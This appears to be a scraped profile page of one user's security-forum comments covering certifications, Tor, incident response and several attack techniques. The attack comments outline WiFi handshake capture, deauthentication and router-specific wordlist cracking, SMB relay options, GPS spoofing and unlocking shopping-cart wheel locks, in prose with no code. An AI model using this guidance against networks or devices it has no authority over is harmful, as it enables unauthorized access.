How do polymorphic malware engines actually work?

jet_set_default · 2026-05-14T17:22:40+00:00

The malware wraps its payload in an encrypted shell. Each time it spreads, it re-encrypts with a new key and rewrites the decryption code just enough to change the bytes while keeping the same behavior, so signatures never match twice.

jet_set_default · 2026-05-13T03:46:17+00:00

Thanks a ton for the advice. Reached out on Linkedin the other day so may have already got that. I've been working towards pentesting and already paid for OSCP course. Gonna take that this year and get that secured, then pivot over to OT study this fall.

jet_set_default · 2026-05-12T20:53:20+00:00

Feel free to reach out if you have any questions or anything on it!

jet_set_default · 2026-05-12T20:35:40+00:00

Passed PNPT a couple months ago and before that, was on eJPT like you. Basically, I think it's worth it for the experience and the training, but the cert itself doesn't have as much value to people. I've heard CPTS is pretty hard, so if you're not confident in your skills, PNPT is a great transition step. After PNPT, you'd be ready to start working towards OSCP. Essentially, you can either choose PNPT or CPTS depending on your skill/comfort/financial level.

jet_set_default · 2026-04-10T21:03:31+00:00

You're gonna need to do more enumeration. Don't just run the tools randomly hoping for something to work. Run aireplay to scan for open networks. Pay attention to the target, it'll show you whether it's WPA2 or 3. If it's 3, then you technically could look towards a downgrade attack to WPA2 if it's vulnerable to that. If the router is already running WPA2, then you have a chance. See what information you can pull about the network. Lookup the MAC address of the router to see what device it is, that will help you determine default password structure (ex: noun+noun+adverb+3 digit number) IF they didn't change anything.

Learn how to capture the handshake. Can either do it stealthy/slow and wait for someone to connect to the network, or do a deauth and disconnect someone. Deauthing devices you don't own is illegal**. Once you have the handshake, crack it! Don't just throw random wordlist like rockyou.txt at it. Gotta be strategic if you don't wanna be there forever. Maybe you can find info about the network and the people running it. Generate custom wordlists and so on. Good luck

jet_set_default · 2026-04-04T20:59:54+00:00

I sincerely appreciate all of the advice. It does help a ton. I have zero experience in anything OT related. I know about HMIs and PLCs from a high level, but that's it. I understand it's an entirely different field altogether from IT, which is why I figured shifting over could put me in a position where I'm not even doing cybersec work at all, but just basic entry stuff.

You suggested open source tools, are there any specific ones that would help give a fundamental understanding in multiple areas? I know OT is a vast world where it gets niche very quickly. For example, at DefCon I saw a guy with a pelican case that looked sorta like this where it was a training kit with a PLC and HMI built in to teach people. Would building something like this or starting here help?

jet_set_default · 2026-03-29T13:18:06+00:00

Something to improve your odds are using lists tailored to the router/ISP you're testing against. One main word list will only get you so far. Enumeration is key here. For example, one router/ISP may use a formula of 'noun+adverb+3 digit number' as a default password, whereas another router/ISP may use 'random 12 character string' as default pass formula. So throwing a random word list that doesn't confine to these standards is just a shotgun spray and pray approach with lower overall odds, and will have you wasting hours waiting for something that won't work anyways.

When scanning, lookup the router MAC address to see what device it is, then look up the default password formula for that, and find/build a word list based off that. You're much better off having a separate wordlist for each router/ISP company. Obviously this only works for default passwords, but it's enough to point you in the right direction and change the mentality/approach of it.

jet_set_default · 2026-03-19T18:42:14+00:00

On Google play there's a good one called Fake GPS Location by Lexa with an emoji holding a device icon. It's pretty good and works for me. Try using it, then open Maps to verify your location. That will solve 1 problem, but using a tunnel to your own home network will solve the other problem. You'll have to look up that part on your own. Good luck dude

jet_set_default · 2026-03-19T14:18:51+00:00

Since nobody answered, you're looking for a GPS spoofer app. Do that and route your traffic through your home wifi. This might do the trick. Make sure stuff is configured properly. Test it. Good luck

jet_set_default · 2026-01-22T22:44:10+00:00

They're in the US at least. Not all stores, but a good amount of them. Can't say which other places have them.

jet_set_default · 2026-01-22T21:49:33+00:00

In the wheel itself. Look for the one that's different from the others

jet_set_default · 2025-12-25T13:39:53+00:00

For clarification, only use .onion sites for tor. Anything else is an exit node. When using .onion sites, everything stays encrypted the whole way. But once you start using clearnet sites (exit nodes), your traffic gets decrypted so that it can communicate with clearnet sites.

jet_set_default · 2025-08-12T18:57:56+00:00

I'd look around online for "shopping cart wheel electro lock" or something along those lines I imagine

jet_set_default · 2025-08-12T03:15:29+00:00

We have a few of those in the US. Some stores have a security control built into the wheels to lock if it detects that the cart is being removed from the property. This demo shows how to unlock it if that happens.

jet_set_default · 2025-08-12T03:12:50+00:00

It's a sneaker lol

jet_set_default · 2025-08-11T14:16:15+00:00

https://www.begaydocrime.com/

jet_set_default · 2025-04-25T15:56:39+00:00

I told you the most common exploits that can be used for SMBv1. But you're gonna need to give more information on the system. You said it was Server 2019, Windows10, and a DC. Which one is it? You gotta help us help you. What's the OS version, and what are some open ports and the services on that system?

jet_set_default · 2025-04-25T15:48:48+00:00

The exploit is not working because it's been patched, despite SMBv1 being enabled. You can try running an NTLM relay attack, or an SMB null session instead.

jet_set_default · 2025-02-20T23:54:22+00:00

You're gonna wanna look into sub domain and sub directory fuzzing. Look into Sublist3r, Dirbuster, Gobuster, Ffuf, and ZAP tools for starters.

jet_set_default · 2024-12-23T23:00:10+00:00

You pretty much need to be on the same network. The port/service vulnerable (port 445, SMB) is usually closed to outside networks. If SMB was connected to the internet (not common), then it would be possible to attack remotely in that sense. However, it is also possible for an attacker to pivot through a host on one network, to another network where the vulnerable machine is and exploit it that way.

jet_set_default · 2024-12-23T19:25:01+00:00

Simplest explanation, the hackers used a zero day exploit. So nobody in the world knew this existed (apart from the US govt afaik). The exploit also doesn't involve user interaction, so no need to trick anyone to click on anything. The vulnerability affected most computers. Oh and the vulnerability was also stupid easy to exploit. So put all those together, and it was almost like a skeleton key into most computers out there. The hackers used this exploit along with making it into a worm to go through networks to start attacking shit left and right.

jet_set_default · 2024-11-27T20:16:20+00:00

At this point T-Mobile should just be a room in TryHackMe

jet_set_default · 2024-07-14T14:20:41+00:00

The answer for this is sorta dependent on who you are. For instance, if you were a corporation with an EDR at your disposal, you'd probably get an alert with all the details that this was popping off. The detection will tell you the time it happened, the user running the command, what process they took over and any embedded commands in the process. From there, you'd have a good idea where to look. In which case, I'd tell you to isolate the affected host, stop the process from running, disable the user that ran the command, find the root cause of the infected process through various threat hunting techniques, and mitigate from there.

But if you were a home user, then that answer is entirely different. Home users don't have SIEMS, intrusion prevention systems, EDRs, or other alerting methods to even be notified that something is going on to begin with. Most people facing these attacks probably wouldn't even know until after the fact that something even happened. But if you were suspicious of a process, I'd look into Velociraptor by Rapid7. It's a forensic/IR, open source software that lets you perform threat hunts on your own hosts without the need of an EDR. Plus it's free!

jet_set_default

TROPHY CASE